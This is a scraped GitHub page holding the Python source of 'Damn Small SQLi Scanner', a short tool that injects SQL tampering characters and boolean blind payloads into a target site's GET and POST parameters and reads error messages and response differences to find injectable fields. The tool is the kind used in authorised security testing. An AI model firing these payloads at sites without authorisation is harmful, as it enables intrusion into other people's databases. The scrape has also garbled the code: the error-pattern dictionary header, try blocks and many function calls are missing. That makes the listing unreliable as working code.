Skip to content


Subversion checkout URL

You can clone with
Download ZIP
tree: 3c2855f1fb
Fetching contributors…

Cannot retrieve contributors at this time

98 lines (89 sloc) 6.852 kB
#!/usr/bin/env python
import difflib, httplib, itertools, optparse, random, re, urllib2, urlparse
NAME = "Damn Small SQLi Scanner (DSSS) < 100 LOC (Lines of Code)"
VERSION = "0.2b"
AUTHOR = "Miroslav Stampar ( | @stamparm)"
LICENSE = "Public domain (FREE)"
PREFIXES = (" ", ") ", "' ", "') ", "\"") # prefix values used for building testing blind payloads
SUFFIXES = ("", "-- ", "#") # suffix values used for building testing blind payloads
TAMPER_SQL_CHAR_POOL = ('(', ')', '\'', '"') # characters used for SQL tampering/poisoning of parameter values
BOOLEAN_TESTS = ("AND %d=%d", "OR NOT (%d=%d)") # boolean tests used for building testing blind payloads
COOKIE, UA, REFERER = "Cookie", "User-Agent", "Referer" # optional HTTP header names
GET, POST = "GET", "POST" # enumerator-like values used for marking current phase
TEXT, HTTPCODE, TITLE, HTML = range(4) # enumerator-like values used for marking content type
FUZZY_THRESHOLD = 0.95 # ratio value in range (0,1) used for distinguishing True from False responses
"MySQL": (r"SQL syntax.*MySQL", r"Warning.*mysql_.*", r"valid MySQL result", r"MySqlClient\."),
"PostgreSQL": (r"PostgreSQL.*ERROR", r"Warning.*\Wpg_.*", r"valid PostgreSQL result", r"Npgsql\."),
"Microsoft SQL Server": (r"Driver.* SQL[\-\_\ ]*Server", r"OLE DB.* SQL Server", r"(\W|\A)SQL Server.*Driver", r"Warning.*mssql_.*", r"(\W|\A)SQL Server.*[0-9a-fA-F]{8}", r"(?s)Exception.*\WSystem\.Data\.SqlClient\.", r"(?s)Exception.*\WRoadhouse\.Cms\."),
"Microsoft Access": (r"Microsoft Access Driver", r"JET Database Engine", r"Access Database Engine"),
"Oracle": (r"ORA-[0-9][0-9][0-9][0-9]", r"Oracle error", r"Oracle.*Driver", r"Warning.*\Woci_.*", r"Warning.*\Wora_.*")
_headers = {} # used for storing dictionary with optional header values
def retrieve_content(url, data=None):
retval = {HTTPCODE: httplib.OK}
req = urllib2.Request("".join(url[i].replace(' ', '%20') if i > url.find('?') else url[i] for i in xrange(len(url))), data, _headers)
retval[HTML] = urllib2.urlopen(req).read()
except Exception, ex:
retval[HTTPCODE] = getattr(ex, "code", None)
retval[HTML] = if hasattr(ex, "read") else getattr(ex, "msg", "")
match ="<title>(?P<result>[^<]+)</title>", retval[HTML], re.I)
retval[TITLE] ="result") if match and "result" in match.groupdict() else None
retval[TEXT] = re.sub(r"(?si)<script.+?</script>|<!--.+?-->|<style.+?</style>|<[^>]+>|\s+", " ", retval[HTML])
return retval
def scan_page(url, data=None):
retval, usable = False, False
for phase in (GET, POST):
current = url if phase is GET else (data or "")
for match in re.finditer(r"((\A|[?&])(?P<parameter>\w+)=)(?P<value>[^&]+)", current):
vulnerable, usable = False, True
print "* scanning %s parameter '%s'" % (phase,"parameter"))
tampered = current.replace(, "%s%s" % (, "".join(random.sample(TAMPER_SQL_CHAR_POOL, len(TAMPER_SQL_CHAR_POOL)))))
content = retrieve_content(tampered, data) if phase is GET else retrieve_content(url, tampered)
for (dbms, regex) in ((dbms, regex) for dbms in DBMS_ERRORS for regex in DBMS_ERRORS[dbms]):
if not vulnerable and, content[HTML], re.I):
print " (i) %s parameter '%s' could be error SQLi vulnerable (%s)" % (phase,"parameter"), dbms)
retval = vulnerable = True
vulnerable = False
original = retrieve_content(current, data) if phase is GET else retrieve_content(url, current)
left, right = random.sample(xrange(256), 2)
for prefix, boolean, suffix in itertools.product(PREFIXES, BOOLEAN_TESTS, SUFFIXES):
if not vulnerable:
template = "%s%s%s" % (prefix, boolean, suffix)
payloads = dict((x, current.replace(, "%s%s" % (, (template % (left, left if x else right))))) for x in (True, False))
contents = dict((x, retrieve_content(payloads[x], data) if phase is GET else retrieve_content(url, payloads[x])) for x in (True, False))
if any(original[x] == contents[True][x] != contents[False][x] for x in (HTTPCODE, TITLE)) or len(original[TEXT]) == len(contents[True][TEXT]) != len(contents[False][TEXT]):
vulnerable = True
ratios = dict((x, difflib.SequenceMatcher(None, original[TEXT], contents[x][TEXT]).quick_ratio()) for x in (True, False))
vulnerable = ratios[True] > FUZZY_THRESHOLD and ratios[False] < FUZZY_THRESHOLD
if vulnerable:
print " (i) %s parameter '%s' appears to be blind SQLi vulnerable" % (phase,"parameter"))
retval = True
if not usable:
print " (x) no usable GET/POST parameters found"
except KeyboardInterrupt:
print "\r (x) Ctrl-C pressed"
return retval
def init_options(proxy=None, cookie=None, ua=None, referer=None):
if proxy:
urllib2.install_opener(urllib2.build_opener(urllib2.ProxyHandler({'http': proxy})))
_headers.update(dict(filter(lambda item: item[1], [(COOKIE, cookie), (UA, ua), (REFERER, referer)])))
if __name__ == "__main__":
print "%s #v%s\n by: %s\n" % (NAME, VERSION, AUTHOR)
parser = optparse.OptionParser(version=VERSION)
parser.add_option("-u", "--url", dest="url", help="Target URL (e.g. \"\")")
parser.add_option("--data", dest="data", help="POST data (e.g. \"query=test\")")
parser.add_option("--cookie", dest="cookie", help="HTTP Cookie header value")
parser.add_option("--user-agent", dest="ua", help="HTTP User-Agent header value")
parser.add_option("--referer", dest="referer", help="HTTP Referer header value")
parser.add_option("--proxy", dest="proxy", help="HTTP proxy address (e.g. \"\")")
options, _ = parser.parse_args()
if options.url:
init_options(options.proxy, options.cookie,, options.referer)
result = scan_page(options.url if options.url.startswith("http") else "http://%s" % options.url,
print "\nscan results: %s vulnerabilities found" % ("possible" if result else "no")
Jump to Line
Something went wrong with that request. Please try again.